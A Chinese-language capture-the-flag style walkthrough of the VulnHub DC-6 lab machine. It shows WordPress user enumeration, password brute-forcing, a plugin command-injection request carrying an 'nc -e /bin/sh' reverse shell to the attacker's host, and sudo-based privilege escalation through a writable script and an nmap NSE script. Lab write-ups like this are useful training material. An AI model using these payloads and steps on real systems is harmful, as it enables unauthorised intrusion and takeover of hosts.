vulnhub-DC-6

信息收集

老规矩，nmap扫一下

└─# nmap -A -p1-65535 192.168.20.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 12:33 CST
Nmap scan report for 192.168.20.135
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:E1:2A:54 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.56 ms 192.168.20.135

开放80和22，去80看看，注意配置hosts文件（DC-2里有讲怎么配置）发现是一个wordpress，这种简单靶机就显然提示这里有漏洞，有了dc-2的经验，这里收集一下用户名

wpscan --url http://wordy -e u


[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

密码爆破

收集到5个，写进字典，但是密码呢，在真实环境中还真不一定能拿到，这里是作者提示了在rockyou.txt字典中带k01的密码，所以可以拿到密码字典

cat rockyou.txt| grep k01 >pass.txt

然后可以进行爆破，wordpress·还是用wpscan爆破方便一点

wpscan --url http://wordy -U user.txt -P pass.txt 

[!] Valid Combinations Found:
 | Username: mark, Password: helpdesk01

把用户拿去登录后台，后台还是没自动跳转，登录后手动进入到edit.php

插件安全（wordy）

首页提示了注意插件安全，所以重点看看插件，这里发现此插件在解析ip的时候可以通过管道符进行任意命令执行

由于限制了长度，所以可以在bp上弹shell

POST /wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools HTTP/1.1
Host: wordy
Content-Length: 275
Cache-Control: max-age=0
Origin: http://wordy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytUJOC69BDFc7z6m4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_14014489b649086e51cacb340bafe656=mark%7C1732338496%7CiiKd8umIKTjn6vk3KpFFNNmA1ExFnk18EAaygqfqcgf%7C556aa13f6687d0e918de1bb5dd551ee18a55820d393ba51e08cd4710670688bb; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_14014489b649086e51cacb340bafe656=mark%7C1732338496%7CiiKd8umIKTjn6vk3KpFFNNmA1ExFnk18EAaygqfqcgf%7Cd5fab93259595116b0b92d15316e485e531a1449231fa71a15c6c10994e3dc6d; wp-settings-time-3=1732165860
Connection: close

------WebKitFormBoundarytUJOC69BDFc7z6m4
Content-Disposition: form-data; name="ip"

127.0.0.1|nc -e /bin/sh 192.168.20.129 1111
------WebKitFormBoundarytUJOC69BDFc7z6m4
Content-Disposition: form-data; name="lookup"

Lookup
------WebKitFormBoundarytUJOC69BDFc7z6m4--


nc -lvnp 1111

提权

老规矩查看sudo和suid

www-data@dc-6:/var/www/html/wp-admin$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
www-data@dc-6:/var/www/html/wp-admin$ sudo -l
sudo -l

没有可以提权的命令，那只能翻翻有没有什么线索了，既然后台是mark，那么我们去看看mark的家目录，发现了graham

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

用ssh远程登录，再看看sudo

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

这里可以以jens的身份执行jens的脚本，看看脚本内容

graham@dc-6:~$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

既然可以执行，那么直接写入/bin/bash拿jens的权限

graham@dc-6:~$ echo "/bin/bash" >> /home/jens/backups.sh

记住要以jens身份执行

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
/home/jens/backups.sh: 2: /home/jens/backups.sh: B: not found
tar: Removing leading `/' from member names
whoami
jens@dc-6:~$ whoami
jens

再看看sudo还有nmap

hing Defaults entries for jens on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

nmap提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

jens@dc-6:~$ sudo nmap --script=$TF

Starting Nmap 7.40 ( https://nmap.org ) at 2024-11-21 15:35 AEST
NSE: Warning: Loading '/tmp/tmp.REhDsNkr5u' -- the recommended file extension is '.nse'.
# root
# root@dc-6:/home/jens# ls
backups.sh  backups.tar.gz
root@dc-6:/home/jens# whoami
root
root@dc-6:/home/jens# 

至此靶机攻克

结语

还是一些老套路，这里是几次sudo提权，所以要注意sudo滥用，知识点：wordpress用户收集、ip解析任意命令执行、sudo提权